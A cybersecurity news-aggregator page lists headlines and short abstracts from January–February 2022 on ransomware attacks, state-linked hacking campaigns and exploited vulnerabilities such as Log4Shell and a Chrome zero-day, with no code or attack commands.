Threat analysts have observed a new wave of attacks installing Cobalt Strike beacons on vulnerable Microsoft SQL Servers, leading to deeper infiltration and subsequent malware infections.BleepingComputer
February 22, 2022
Cookware giant Meyer Corporation discloses cyberattack Full Text
Abstract
US cookware distributor giant Meyer Corporation discloses a data breach that affected thousands of its employees. Meyer Corporation, the second-largest cookware distributor globally, has disclosed a data breach that affects thousands of its employees. The...Security Affairs
February 22, 2022
Chinese Hackers Target Taiwan’s Financial Trading Sector with Supply Chain Attack Full Text
Abstract
An advanced persistent threat (APT) group operating with objectives aligned with the Chinese government has been linked to an organized supply chain attack on Taiwan's financial sector. The attacks are said to have first commenced at the end of November 2021, with the intrusions attributed to a threat actor tracked as APT10 , also known as Stone Panda, the MenuPass group, and Bronze Riverside, and known to be active since at least 2009. The second wave of attacks hit a peak between February 10 and 13, 2022, according to a new report published by Taiwanese cybersecurity firm CyCraft, which said the wide-ranging supply chain compromise specifically targeted the software systems of financial institutions, resulting in "abnormal cases of placing orders." The infiltration activity, codenamed " Operation Cache Panda ," exploited a vulnerability in the web management interface of the unnamed securities software that has a market share of over 80% in Taiwan, usiThe Hacker News
February 22, 2022
A cyber attack heavily impacted operations of Expeditors International Full Text
Abstract
American worldwide logistics and freight forwarding company Expeditors International shuts down global operations after cyber attack American logistics and freight forwarding company Expeditors International was hit by a cyberattack over the weekend...Security Affairs
February 21, 2022
Hackers Backdoor Unpatched Microsoft SQL Database Servers with Cobalt Strike Full Text
Abstract
Vulnerable internet-facing Microsoft SQL (MS SQL) Servers are being targeted by threat actors as part of a new campaign to deploy the Cobalt Strike adversary simulation tool on compromised hosts. "Attacks that target MS SQL servers include attacks to the environment where its vulnerability has not been patched, brute forcing, and dictionary attack against poorly managed servers," South Korean cybersecurity company AhnLab Security Emergency Response Center (ASEC) said in a report published Monday. Cobalt Strike is a commercial, full-featured penetration testing framework that allows an attacker to deploy an agent named "Beacon" on the victim machine, granting the operator remote access to the system. Although billed as a red team threat simulation platform, cracked versions of the software have been actively used by a wide range of threat actors. Intrusions observed by ASEC involve the unidentified actor scanning port 1433 to check for exposed MS SQL sThe Hacker News
February 21, 2022
Iranian State Broadcaster IRIB Hit by Destructive Wiper Malware Full Text
Abstract
An investigation into the cyberattack targeting Iranian national media corporation, Islamic Republic of Iran Broadcasting (IRIB), in late January 2022 resulted in the deployment of a wiper malware and other custom implants, as the country's national infrastructure continues to face a wave of attacks aimed at inflicting serious damage. "This indicates that the attackers' aim was also to disrupt the state's broadcasting networks, with the damage to the TV and radio networks possibly more serious than officially reported," Tel Aviv-based cybersecurity firm Check Point said in a report published last week. The 10-second attack, which took place on January 27, involved the breach of state broadcaster IRIB to air pictures of Mujahedin-e-Khalq Organization ( MKO ) leaders Maryam and Massoud Rajavi alongside a call for the assassination of the Supreme Leader Ayatollah Ali Khamenei. "This is an extremely complex attack and only the owners of this technologyThe Hacker News
February 21, 2022
Cookware giant Meyer discloses cyberattack that impacted employees Full Text
Abstract
Meyer Corporation, the largest cookware distributor in the U.S., and the second-largest globally, has informed U.S. Attorney General offices of a data breach affecting thousands of its employees.BleepingComputer
February 21, 2022
New Xenomorph Android malware targets customers of 56 banks Full Text
Abstract
A new malware called Xenomorph distributed through Google Play Store has infected more than 50,000 Android devices to steal banking information.BleepingComputer
February 20, 2022
New phishing campaign targets Monzo online-banking customers Full Text
Abstract
Users of Monzo, one of the UK's most popular digital-only banking platforms, are being targeted by phishing messages supported by a growing network of malicious websites.BleepingComputer
February 20, 2022
Hackers Target Microsoft Teams Users in Chats Full Text
Abstract
Cybercriminals are planting maldocs in chat threads on Microsoft Teams. Users accessing it might end up giving control of their systems to hackers. Organizations are suggested to deploy email gateway security that secures communication applications, and employees should contact IT whenever a suspic ... Read MoreCyware Alerts - Hacker News
February 19, 2022
Attackers Abuse Poorly Regulated Top-Level Domains in Ongoing Redirect Campaign Full Text
Abstract
One of the more common infections that seen is the site-wide redirects to spam and scam sites, achieved by attackers exploiting newly found vulnerabilities in popular WordPress plugins.Sucuri
February 18, 2022
Iranian hackers target VMware Horizon servers with Log4j exploits Full Text
Abstract
An Iranian-aligned hacking group tracked as TunnelVision was spotted exploiting Log4j on VMware Horizon servers to breach corporate networks in the Middle East and the United States.BleepingComputer
February 17, 2022
Iranian Hackers Targeting VMware Horizon Log4j Flaws to Deploy Ransomware Full Text
Abstract
A "potentially destructive actor" aligned with the government of Iran is actively exploiting the well-known Log4j vulnerability to infect unpatched VMware Horizon servers with ransomware. Cybersecurity firm SentinelOne dubbed the group " TunnelVision " owing to their heavy reliance on tunneling tools, with overlaps in tactics observed to that of a broader group tracked under the moniker Phosphorus as well as Charming Kitten and Nemesis Kitten. "TunnelVision activities are characterized by wide-exploitation of 1-day vulnerabilities in target regions," SentinelOne researchers Amitai Ben Shushan Ehrlich and Yair Rigevsky said in a report, with the intrusions detected in the Middle East and the U.S. Also observed alongside Log4Shell is the exploitation of Fortinet FortiOS path traversal flaw ( CVE-2018-13379 ) and the Microsoft Exchange ProxyShell vulnerability to gain initial access into the target networks for post-exploitation. "TunnelVisThe Hacker News
February 17, 2022
Threat actors leverage Microsoft Teams to spread malware Full Text
Abstract
Attackers compromise Microsoft Teams accounts to attach malicious executables to chat and spread them to participants in the conversation. While the popularity of Microsoft Teams continues to grow, with roughly 270 million monthly active users, threat...Security Affairs
February 17, 2022
Nation-state actors hacked Red Cross exploiting a Zoho bug Full Text
Abstract
The International Committee of the Red Cross (ICRC) said attackers that breached its network last month exploited a Zoho bug. The International Committee of the Red Cross (ICRC) revealed that the attack that breached its network in January was conducted...Security Affairs
February 16, 2022
Massive LinkedIn Phishing, Bot Attacks Feed on the Job-Hungry Full Text
Abstract
The phishing attacks are spoofing LinkedIn to target ‘Great Resignation’ job hunters, who are also being preyed on by huge data-scraping bot attacks.Threatpost
February 16, 2022
Emotet Now Spreading Through Malicious Excel Files Full Text
Abstract
An ongoing malicious email campaign that includes macro-laden files and multiple layers of obfuscation has been active since late December.Threatpost
February 16, 2022
Moses Staff Hackers Targeting Israeli Organizations for Cyber Espionage Full Text
Abstract
The politically motivated Moses Staff hacker group has been observed using a custom multi-component toolset with the goal of carrying out espionage against its targets as part of a new campaign that exclusively singles out Israeli organizations. First publicly documented in late 2021, Moses Staff is believed to be sponsored by the Iranian government, with attacks reported against entities in Israel, Italy, India, Germany, Chile, Turkey, the U.A.E., and the U.S. Earlier this month, the hacker collective was observed incorporating a previously undocumented remote access trojan (RAT) called " StrifeWater " that masquerades as the Windows Calculator app to evade detection. "Close examination reveals that the group has been active for over a year, much earlier than the group's first official public exposure, managing to stay under the radar with an extremely low detection rate," findings from FortiGuard Labs reveal . The latest threat activity involves an aThe Hacker News
February 16, 2022
US says Russian hackers targeted defense contractors Full Text
Abstract
The U.S. intelligence community says that Russian-sponsored actors have been targeting defense contractors for at least the past two years and in some cases have gained access to sensitive information.The Hill
February 15, 2022
SquirrelWaffle Adds a Twist of Fraud to Exchange Server Malspamming Full Text
Abstract
SquirrelWaffle attackers now use typosquatting to keep sending spam, even after Exchange servers are patched for ProxyLogon/ProxyShell.Threatpost
February 15, 2022
Hillicon Valley — Cyberattack hits Ukrainian defense Full Text
Abstract
Today is Tuesday. Welcome to Hillicon Valley, detailing all you need to know about tech and cyber news from Capitol Hill to Silicon Valley. Subscribe here: thehill.com/newsletter-signup.The Hill
February 15, 2022
Researchers Link ShadowPad Malware Attacks to Chinese Ministry and PLA Full Text
Abstract
Cybersecurity researchers have detailed the inner workings of ShadowPad , a sophisticated and modular backdoor that has been adopted by a growing number of Chinese threat groups in recent years, while also linking it to the country's civilian and military intelligence agencies. "ShadowPad is decrypted in memory using a custom decryption algorithm," researchers from Secureworks said in a report shared with The Hacker News. "ShadowPad extracts information about the host, executes commands, interacts with the file system and registry, and deploys new modules to extend functionality." ShadowPad is a modular malware platform sharing noticeable overlaps to the PlugX malware and which has been put to use in high-profile attacks against NetSarang, CCleaner, and ASUS, causing the operators to shift tactics and update their defensive measures. While initial campaigns that delivered ShadowPad were attributed to a threat cluster tracked as Bronze Atlas aka BariumThe Hacker News
February 15, 2022
Ukraine: Military defense agencies and banks hit by cyberattacks Full Text
Abstract
Ukraine 's defense agencies and two state-owned banks were hit by Distributed Denial-of-Service (DDoS) attacks. The Ministry of Defense and the Armed Forces of Ukraine and state-owned banks, Privatbank (Ukraine's largest bank) and Oschadbank...Security Affairs
February 15, 2022
Ukraine Defense Ministry, banks hit by cyberattack amid tensions with Russia Full Text
Abstract
Ukraine’s Ministry of Defense on Tuesday said it had been hit with a cyberattack amid heightened tensions with Russia and concerns Moscow could launch aggressive actions against the country, including a potential ground invasion.The Hill
February 15, 2022
BlackCat gang claimed responsibility for Swissport ransomware attack Full Text
Abstract
The BlackCat ransomware group (aka ALPHV), claimed responsibility for the attack on Swissport that interfered with its operations. The BlackCat ransomware group (aka ALPHV), has claimed responsibility for the cyberattack on Swissport...Security Affairs
February 14, 2022
BlackByte Tackles the SF 49ers & US Critical Infrastructure Full Text
Abstract
Hours before the Superbowl and two days after the FBI warned about the ransomware gang, BlackByte leaked what are purportedly the NFL team’s files.Threatpost
February 14, 2022
New Chrome 0-Day Bug Under Active Attack – Update Your Browser ASAP! Full Text
Abstract
Google on Monday rolled out fixes for eight security issues in the Chrome web browser, including a high-severity vulnerability that's being actively exploited in real-world attacks, marking the first zero-day patched by the internet giant in 2022. The shortcoming, tracked CVE-2022-0609 , is described as a use-after-free vulnerability in the Animation component that, if successfully exploited, could lead to corruption of valid data and the execution of arbitrary code on affected systems. "Google is aware of reports that an exploit for CVE-2022-0609 exists in the wild," the company said in a characteristically brief statement acknowledging active exploitation of the flaw. Credited with discovering and reporting the flaw are Adam Weidemann and Clément Lecigne of Google's Threat Analysis Group (TAG). Also addressed by Google four other use-after-free flaws impacting File Manager, File Manager, ANGLE , and GPU, a heap buffer overflow bug in Tab Groups, an inteThe Hacker News
February 14, 2022
SSU: Russia-linked actors are targeting Ukraine with ‘massive wave of hybrid warfare’ Full Text
Abstract
The Security Service of Ukraine (SSU) said the country is the target of an ongoing "wave of hybrid warfare." The Security Service of Ukraine (SSU) today revealed the country is the target of an ongoing "wave of hybrid warfare" conducted by Russia-linked...Security Affairs
February 14, 2022
Ukraine says it’s targeted by ‘massive wave of hybrid warfare’ Full Text
Abstract
The Security Service of Ukraine (SSU) today said the country is the target of an ongoing "wave of hybrid warfare," aiming to instill anxiety and undermine Ukrainian society's confidence in the state's ability to defend its citizens.BleepingComputer
February 14, 2022
Sports brand Mizuno hit with ransomware attack delaying orders Full Text
Abstract
Sports equipment and sportswear brand Mizuno is affected by phone outages and order delays after being hit by ransomware, BleepingComputer has learned from sources familiar with the attack.BleepingComputer
February 14, 2022
Europe’s Largest Car Dealer Faces Hive Ransomware Attack Full Text
Abstract
Emil Frey was hit with a ransomware attack last month, according to a statement from the company. It showed up on the list of victims for the Hive ransomware on February 1.ZDNet
February 14, 2022
San Francisco 49ers Confirm Ransomware Attack on its Corporate IT Network Full Text
Abstract
The San Francisco 49ers NFL team has fallen victim to a ransomware attack that encrypted files on its corporate IT network, a spokesperson for the team has told The Record.The Record
February 13, 2022
NFL’s San Francisco 49ers hit by Blackbyte ransomware attack Full Text
Abstract
The NFL's San Francisco 49ers team is recovering from a cyberattack by the BlackByte ransomware gang who claims to have stolen data from the American football organization.BleepingComputer
February 13, 2022
San Francisco 49ers NFL team discloses BlackByte ransomware attack Full Text
Abstract
A ransomware attack hit the corporate IT network of the San Francisco 49ers NFL team, The Record reported. The San Francisco 49ers NFL team has fallen victim to a ransomware attack, the news was reported by The Record. The team disclosed the attack...Security Affairs
February 11, 2022
Hackers Planted Fake Digital Evidence on Devices of Indian Activists and Lawyers Full Text
Abstract
A previously unknown hacking group has been linked to targeted attacks against human rights activists, human rights defenders, academics, and lawyers across India in an attempt to plant "incriminating digital evidence." Cybersecurity firm SentinelOne attributed the intrusions to a group it tracks as " ModifiedElephant ," an elusive threat actor that's been operational since at least 2012, whose activity aligns sharply with Indian state interests. "ModifiedElephant operates through the use of commercially available remote access trojans (RATs) and has potential ties to the commercial surveillance industry," the researchers said . "The threat actor uses spear-phishing with malicious documents to deliver malware, such as NetWire , DarkComet , and simple keyloggers." The primary goal of ModifiedElephant is to facilitate long-term surveillance of targeted individuals, ultimately leading to the delivery of "evidence" on the victimThe Hacker News
February 11, 2022
Series of Magecart Attacks Against Outdated Magento Sites Full Text
Abstract
Another massive wave of Magecart attacks was detected by Sansec last week. This attack, once again, highlights the vulnerability of e-commerce sites running outdated software.Cyware Alerts - Hacker News
February 11, 2022
The Pirate Bay Clones Target Millions of Users Every Month Full Text
Abstract
CyberNews discovered five malicious domains parading around as The Pirate Bay. These domains served malicious ads to more than seven million users every month by using free content to lure targets.Cyware Alerts - Hacker News
February 10, 2022
Attackers Increasingly Adopting Regsvr32 Utility Execution Via Office Documents Full Text
Abstract
The Uptycs threat research team has been observing an increase in utilization of regsvr32.exe heavily via various types of Microsoft Office documents. The full report that includes Indicators of Compromise (IOCs) is available here: https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents During...Security Affairs
February 10, 2022
Sharp SIM-Swapping Spike Causes $68M in Losses Full Text
Abstract
The attacks, which lead to 2FA defeat and account takeover, have accelerated by several hundred percent in one year, leading to thousands of drained bank accounts.Threatpost
February 09, 2022
Wave of MageCart attacks target hundreds of outdated Magento sites Full Text
Abstract
Analysts have found the source of a mass breach of over 500 e-commerce stores running the Magento 1 platform and involves a single domain loading a credit card skimmer on all of them.BleepingComputer
February 09, 2022
Iranian Hackers Using New Marlin Backdoor in ‘Out to Sea’ Espionage Campaign Full Text
Abstract
An advanced persistent threat (APT) group with ties to Iran has refreshed its malware toolset to include a new backdoor dubbed Marlin as part of a long-running espionage campaign that started in April 2018. Slovak cybersecurity company ESET attributed the attacks — codenamed "Out to Sea" — to a threat actor called OilRig (aka APT34), while also conclusively connecting its activities to a second Iranian group tracked under the name Lyceum (Hexane aka SiameseKitten ). "Victims of the campaign include diplomatic organizations, technology companies, and medical organizations in Israel, Tunisia, and the United Arab Emirates," ESET noted in its T3 2021 Threat Report shared with The Hacker News. Active since at least 2014, the hacking group is known to strike Middle Eastern governments and a variety of business verticals, including chemical, energy, financial, and telecommunications. In April 2021, the actor targeted a Lebanese entity with an implant calledThe Hacker News
February 9, 2022
The Pirate Bay clones target millions of users with malware and malicious ads Full Text
Abstract
CyberNews researchers discovered five clones of The Pirate Bay serving malicious ads to more than seven million users each month. Original Post @ https://cybernews.com/security/the-pirate-bay-clones-target-millions-of-users-with-malware-and-malicious-ads/ CyberNews...Security Affairs
February 09, 2022
Molerats hackers deploy new malware in highly evasive campaign Full Text
Abstract
The Palestinian-aligned APT group tracked as TA402 (aka Molerats) was spotted using a new implant named 'NimbleMamba' in a cyber-espionage campaign that leverages geofencing and URL redirects to legitimate websites.BleepingComputer
February 8, 2022
China Suspected of News Corp Cyberespionage Attack Full Text
Abstract
Attackers infiltrated the media giant’s network using BEC, while Microsoft moved to stop such attacks by blocking VBA macros in 5 Windows apps. Included: more ways to help stop BEC.Threatpost
February 08, 2022
Palestinian Hackers Use New NimbleMamba Implant in Recent Attacks Full Text
Abstract
An advanced persistent threat (APT) hacking group operating with motives that likely align with Palestine has embarked on a new campaign that leverages a previously undocumented implant called NimbleMamba . The intrusions leveraged a sophisticated attack chain targeting Middle Eastern governments, foreign policy think tanks, and a state-affiliated airline, enterprise security firm Proofpoint said in a report, attributing the covert operation to a threat actor tracked as Molerats (aka TA402). Notorious for continuously updating their malware implants and their delivery methods, the APT group was most recently linked to an espionage offensive aimed at human rights activists and journalists in Palestine and Turkey, while a previous attack exposed in June 2021 resulted in the deployment of a backdoor called LastConn . But the lull in the activities has been offset by the operators actively working to retool their arsenal, resulting in the development of NimbleMamba, which is desiThe Hacker News
February 8, 2022
Gamaredon Responsible for Attacks on Ukraine Since 2021 Full Text
Abstract
Microsoft shared new information on Gamaredon, also known as ACTINIUM, which has been responsible for a plethora of spear-phishing attacks against Ukrainian organizations since October 2021. One of the techniques used by Gamaredon was sending spear-phishing emails containing malicious macro as atta ... Read MoreCyware Alerts - Hacker News
February 8, 2022
Vodafone Portugal hit by a massive cyberattack Full Text
Abstract
A cyberattack hit Vodafone Portugal causing severe outages in the country of its communication and television services. Vodafone Portugal suffered a major cyberattack that caused service outages in the country, media reported the temporary disruption...Security Affairs
February 07, 2022
Roaming Mantis Android malware campaign sets sights on Europe Full Text
Abstract
The Roaming Mantis SMS phishing campaign has finally reached Europe, as researchers detect campaigns targeting Android and iPhone users in Germany and France with malicious apps and phishing pages.BleepingComputer
February 7, 2022
Gamaredon Targets Ukraine with New Payloads Full Text
Abstract
Symantec experts disclosed that the Russia-linked Gamaredon deployed eight custom malware samples against Ukrainian targets in the attacks that began last year in July. These files launch a VBS file that eventually drops a well-documented backdoor, known as Pteranodon. Organizations are suggested t ... Read MoreCyware Alerts - Hacker News
February 4, 2022
Ransomware attack hit Swissport International causing delays in flights Full Text
Abstract
Swissport International was hit by a ransomware attack that had a severe impact on its operations causing flights to suffer delays. The company said via Twitter that the attack has been largely contained.Security Affairs
February 4, 2022
Over 500,000 people were impacted by a ransomware attack that hit Morley Full Text
Abstract
Business services firm Morley was hit by a ransomware attack that may have exposed data of +500,000 individuals. Business services company Morley was victim of a ransomware attack that may have resulted in a data breach impacting more than 500,000...Security Affairs
February 04, 2022
News Corp hit by cyberattack with suspected link to China Full Text
Abstract
The media company News Corp. said Friday it was the victim of a cyberattack likely to benefit the Chinese government, and that the intrusion targeted its businesses including the New York Post, Dow Jones and others.The Hill
February 4, 2022
Ransomware attack hit Swissport International causing delays in flights Full Text
Abstract
Aviation services company Swissport International was hit by a ransomware attack that impacted its operations. Swissport International Ltd. is an aviation services company providing airport ground,lounge hospitality and cargo handling services owned...Security Affairs
February 4, 2022
How attackers got access to the systems of the National Games of China Full Text
Abstract
In early September 2021, Avast threat researcher David Álvarez found a malware sample with a suspicious file extension and a report submitted by the National Games IT team to VirusTotal on an attack against a server associated with the Games.Avast
February 4, 2022
A nation-state actor hacked media and publishing giant News Corp Full Text
Abstract
American media and publishing giant News Corp revealed it was victim of a cyber attack from an advanced persistent threat actor. American media and publishing giant News Corp revealed it was victim of a cyber attack from an advanced persistent threat...Security Affairs
February 4, 2022
Airport Services Firm Faces Cyberattack Resulting in Flight Delays Due to Impact on IT Infrastructure Full Text
Abstract
Swiss airport management service Swissport reported a ransomware attack affecting its IT systems on Friday. The company said its IT infrastructure was targeted by the ransomware attack.ZDNet
February 4, 2022
Millions of Android Users Targeted by Dark Herring Full Text
Abstract
Experts exposed Dark Herring subscription fraud campaign that infected 105 million devices worldwide via 500 malicious apps to steal hundreds of millions of dollars from unsuspecting users. The names of some malicious apps are Smashex, Upgradem, Stream HD, Vidly Vibe, and Cast It. This indicat ... Read MoreCyware Alerts - Hacker News
February 04, 2022
HHS: Conti ransomware encrypted 80% of Ireland’s HSE IT systems Full Text
Abstract
A threat brief published by the US Department of Health and Human Services (HHS) on Thursday paints a grim picture of how Ireland's health service, the HSE, was overwhelmed and had 80% of its systems encrypted during last year's Conti ransomware attack.BleepingComputer
February 04, 2022
News Corp discloses hack from “persistent” nation state cyber attacks Full Text
Abstract
American media and publishing giant News Corp has disclosed today that it was the target of a "persistent" cyberattack. The attack discovered sometime this January, reportedly allowed threat actors to access emails and documents of some News Corp employees, including journalists.BleepingComputer
February 3, 2022
Kronos Still Dragging Itself Back From Ransomware Hell Full Text
Abstract
And customers including Tesla, PepsiCo and NYC transit workers are filing lawsuits over the “real pain in the rear end” of manual inputting, inaccurate wages & more.Threatpost
February 03, 2022
New SEO Poisoning Campaign Distributing Trojanized Versions of Popular Software Full Text
Abstract
An ongoing search engine optimization (SEO) poisoning attack campaign has been observed abusing trust in legitimate software utilities to trick users into downloading BATLOADER malware on compromised machines. "The threat actor used 'free productivity apps installation' or 'free software development tools installation' themes as SEO keywords to lure victims to a compromised website and to download a malicious installer," researchers from Mandiant said in a report published this week. In SEO poisoning attacks, adversaries artificially increase the search engine ranking of websites (genuine or otherwise) hosting their malware to make them show up on top of search results so that users searching for specific apps like TeamViewer, Visual Studio, and Zoom are infected with malware. The installer, while packing the legitimate software, is also bundled with the BATLOADER payload that's executed during the installation process. The malware then acts as aThe Hacker News
February 3, 2022
Tennessee Community College Suffers Ransomware Attack Full Text
Abstract
The college’s main database and credit card payment systems were not involved, and no data from them was accessed by unauthorized users, said the board, which oversees the state’s community colleges.Security Week
February 3, 2022
Oil terminals in Europe’s biggest ports hit by a cyberattack Full Text
Abstract
A cyber attack hit the oil terminals of some of the biggest European ports impacting their operations. Some of the major oil terminals in Western Europe's biggest ports have been targeted with a cyberattack. Threat actors have hit multiple oil facilities...Security Affairs
February 03, 2022
New Wave of Cyber Attacks Target Palestine with Political Bait and Malware Full Text
Abstract
Cybersecurity researchers have turned the spotlight on a new wave of offensive cyberattacks targeting Palestinian activists and entities starting around October 2021 using politically-themed phishing emails and decoy documents. The intrusions are part of what Cisco Talos calls a longstanding espionage and information theft campaign undertaken by the Arid Viper hacking group using a Delphi-based implant called Micropsia dating all the way back to June 2017 . The threat actor's activities , also tracked under the monikers Desert Falcon and the APT-C-23, were first documented in February 2015 by Kasperksy and subsequently in 2017, when Qihoo 360 disclosed details of cross-platform backdoors developed by the group to strike Palestinian institutions. The Russian cybersecurity company-branded Arid Viper the "first exclusively Arabic APT group." Then in April 2021, Meta (formerly Facebook), which pointed out the group's affiliations to the cyber arm of HamasThe Hacker News
February 3, 2022
Ransomware Often Hits Industrial Systems, With Significant Impact: Survey Full Text
Abstract
In a new survey, 80% of respondents admitted that their organization had experienced a ransomware attack within the past year, and nearly half said the incident had impacted their ICS/OT environment.Security Week
February 2, 2022
KP Snacks Left with Crumbs After Ransomware Attack Full Text
Abstract
The Conti gang strikes again, disrupting the nom-merchant’s supply chain and threatening supermarket shelves that could stay empty for weeks.Threatpost
February 2, 2022
DeadBolt Hits QNAP Hard, 3600 Devices Impacted Full Text
Abstract
A new DeadBolt ransomware group encrypted more than 3,600 network-attached storage (NAS) devices worldwide by exploiting a zero-day with the most affected countries being the U.S., France, Taiwan, Italy, and the U.K. QNAP has warned customers to protect their devices by updating the QTS software ve ... Read MoreCyware Alerts - Hacker News
February 02, 2022
Business services provider Morley discloses ransomware incident Full Text
Abstract
Morley Companies Inc. disclosed a data breach after suffering a ransomware attack on August 1st, 2021, allowing threat actors to steal data before encrypting files.BleepingComputer
February 2, 2022
Arid Viper Hackers Strike Palestinian Targets with Political Lures and Trojans Full Text
Abstract
In the past, the group has been responsible for spear phishing attacks against Palestinian law enforcement, the military, educational establishments, and the Israel Security Agency (ISA).ZDNet
February 2, 2022
Massive Social Engineering Campaigns Impacted Banks in Europe and South America Full Text
Abstract
The campaigns, which aim to steal banking secrets and payment cards of users, are carried out by using social engineering schemas, namely smishing, and spear-phishing through fake emails.Security Affairs
February 1, 2022
Massive social engineering waves have impacted banks in several countries Full Text
Abstract
A massive social engineering campaign targeting banks has been delivered in the last two years in several countries. A massive social engineering campaign has been delivered in the last two years in several countries, including Portugal, Spain, Brazil,...Security Affairs
February 1, 2022
A cyber attack severely impacted the operations of German petrol distributor Oiltanking GmbH Full Text
Abstract
German petrol distributor Oiltanking GmbH was a victim of a cyberattack that has a severe impact on its operations. A cyber attack hit Oiltanking GmbH, a German petrol distributor who supplies Shell gas stations in the country, severely impacting...Security Affairs
February 01, 2022
MuddyWater hacking group targets Turkey in new campaign Full Text
Abstract
The Iranian-backed MuddyWater hacking group is conducting a new malicious campaign targeting private Turkish organizations and governmental institutions.BleepingComputer
January 31, 2022
Hundreds of thousands of routers exposed to Eternal Silence campaign via UPnP Full Text
Abstract
A hacking campaign, tracked as Eternal Silence, is abusing UPnP to compromise routers and use them to carry out malicious activities. Researchers from Akamai have spotted a malicious campaign, tracked as 'Eternal Silence,' that is abusing Universal...Security Affairs
January 31, 2022
Russian ‘Gamaredon’ hackers use 8 new malware payloads in attacks Full Text
Abstract
The Russia-linked hackers known as 'Gamaredon' (aka Armageddon or Shuckworm) were spotted deploying eight custom binaries in cyber-espionage operations against Ukrainian entities.BleepingComputer
January 30, 2022
Hybrid cloud campaign OiVaVoii targets company executives Full Text
Abstract
A new hacking campaign, tracked as ‘OiVaVoii’, is targeting company executives with malicious OAuth apps. Researchers from Proofpoint have uncovered a new campaign named ‘OiVaVoii’ that is targeting company executives, former board members,...Security Affairs
January 28, 2022
Hackers Using Device Registration Trick to Attack Enterprises with Lateral Phishing Full Text
Abstract
Microsoft has disclosed details of a large-scale, multi-phase phishing campaign that uses stolen credentials to register devices on a victim's network to further propagate spam emails and widen the infection pool. The tech giant said the attacks manifested through accounts that were not secured using multi-factor authentication (MFA), thereby making it possible for the adversary to take advantage of the target's bring-your-own-device (BYOD) policy and introduce their own rogue devices using the pilfered credentials. The attacks took place in two stages. "The first campaign phase involved stealing credentials in target organizations located predominantly in Australia, Singapore, Indonesia, and Thailand," Microsoft 365 Defender Threat Intelligence Team said in a technical report published this week. "Stolen credentials were then leveraged in the second phase, in which attackers used compromised accounts to expand their foothold within the organization via laThe Hacker News
January 28, 2022
Delta Electronics, a tech giants’ contractor, hit by Conti ransomware Full Text
Abstract
Delta Electronics, a Taiwanese contractor for multiple tech giants such as Apple, Dell, HP and Tesla, was hit by Conti ransomware Taiwanese electronics manufacturing company Delta Electronics was hit by the Conti ransomware that took place this week....Security Affairs
January 28, 2022
QNAP force-installs update after DeadBolt ransomware hits 3,600 devices Full Text
Abstract
QNAP force-updated customer's Network Attached Storage (NAS) devices with firmware containing the latest security updates to protect against the DeadBolt ransomware, which has already encrypted over 3,600 devices.BleepingComputer
January 27, 2022
Puerto Rico was hit by a major cyberattack Full Text
Abstract
Puerto Rico’s Senate announced that is was it by a cyberattack that shut down its internet provider, phone system and official online page. The Senate of Puerto Rico announced this week that it was hit by a major cyberattack that disabled its internet...Security Affairs
January 27, 2022
Taiwanese Apple and Tesla contractor hit by Conti ransomware Full Text
Abstract
Delta Electronics, a Taiwanese electronics company and a provider for Apple, Tesla, HP, and Dell, disclosed that it was the victim of a cyberattack discovered on Friday morning.BleepingComputer
January 27, 2022
105 million Android users targeted by subscription fraud campaign Full Text
Abstract
A premium services subscription scam for Android has been operating for close to two years. Called 'Dark Herring', the operation used 470 Google Play Store apps and affected over 100 million users worldwide, potentially causing hundreds of millions of USD in total losses.BleepingComputer
January 26, 2022
Initial Access Broker Involved in Log4Shell Attacks Against VMware Horizon Servers Full Text
Abstract
An initial access broker group tracked as Prophet Spider has been linked to a set of malicious activities that exploits the Log4Shell vulnerability in unpatched VMware Horizon Servers. According to new research published by BlackBerry Research & Intelligence and Incident Response (IR) teams today, the cybercrime actor has been opportunistically weaponizing the shortcoming to download a second-stage payload onto the victimized systems. The payloads observed include cryptocurrency miners, Cobalt Strike Beacons, and web shells, corroborating a previous advisory from the U.K. National Health Service (NHS) that sounded the alarm on active exploitation of the vulnerabilities in VMware Horizon servers to drop malicious web shells and establish persistence on affected networks for follow-on attacks. Log4Shell is a moniker used to refer to an exploit affecting the popular Apache Log4j library that results in remote code execution by logging a specially crafted string. Since publicThe Hacker News
January 25, 2022
Canada’s foreign ministry targeted in cyberattack Full Text
Abstract
The Canadian foreign ministry has been impacted by a "cyber incident" that has interrupted some of its "internet-based services," the Canadian government said Monday, according to CNN.The Hill
January 25, 2022
Belarus hackers say they’ve targeted railway to impede Russian troop movements Full Text
Abstract
A group of Belarusian hackers on Monday said they have targeted a national railway company in an effort to hinder the movement of Russian troops, as tensions rise between Moscow and Kyiv amid reports of a Russian incursion into Ukraine.The Hill
January 25, 2022
Hackers Infect macOS with New DazzleSpy Backdoor in Watering-Hole Attacks Full Text
Abstract
A previously undocumented cyber-espionage malware aimed at Apple's macOS operating system leveraged a Safari web browser exploit as part of a watering hole attack targeting politically active, pro-democracy individuals in Hong Kong. Slovak cybersecurity firm ESET attributed the intrusion to an actor with "strong technical capabilities," calling out the campaign's overlaps to that of a similar digital offensive disclosed by Google Threat Analysis Group (TAG) in November 2021. The attack chain involved compromising a legitimate website belonging to D100 Radio, a pro-democracy internet radio station in Hong Kong, to inject malicious inline frames (aka iframes ) between September 30 and November 4, 2021. In the next phase, the tampered code acted as a conduit to load a Mach-O file by leveraging a remote code execution bug in WebKit that was fixed by Apple in February 2021 ( CVE-2021-1789 ). "The exploit used to gain code execution in the browser is quiteThe Hacker News
January 25, 2022
Segway Hit by Magecart Attack Hiding in a Favicon Full Text
Abstract
Visitors who shopped on the company’s eCommerce website in January will likely find their payment-card data heisted, researchers warned.Threatpost
January 25, 2022
Sophisticated attackers used DazzleSpy macOS backdoor in watering hole attacks Full Text
Abstract
Experts found an undocumented macOS backdoor, dubbed DazzleSpy, that was employed in watering hole attacks aimed at politically active individuals in Hong Kong. Researchers from ESET have spotted an undocumented macOS backdoor, dubbed DazzleSpy,...Security Affairs
January 25, 2022
Attackers are actively targeting critical RCE bug in SonicWall Secure Mobile Access Full Text
Abstract
Threat actors are actively exploiting a critical flaw (CVE-2021-20038) in SonicWall's Secure Mobile Access (SMA) gateways addressed in December. Threat actors are actively exploiting a critical flaw, tracked as CVE-2021-20038, in SonicWall's Secure...Security Affairs
January 24, 2022
Attackers now actively targeting critical SonicWall RCE bug Full Text
Abstract
A critical severity vulnerability impacting SonicWall's Secure Mobile Access (SMA) gateways addressed last month is now targeted in ongoing exploitation attempts.BleepingComputer
January 24, 2022
Tens of AccessPress WordPress themes compromised as part of a supply chain attack Full Text
Abstract
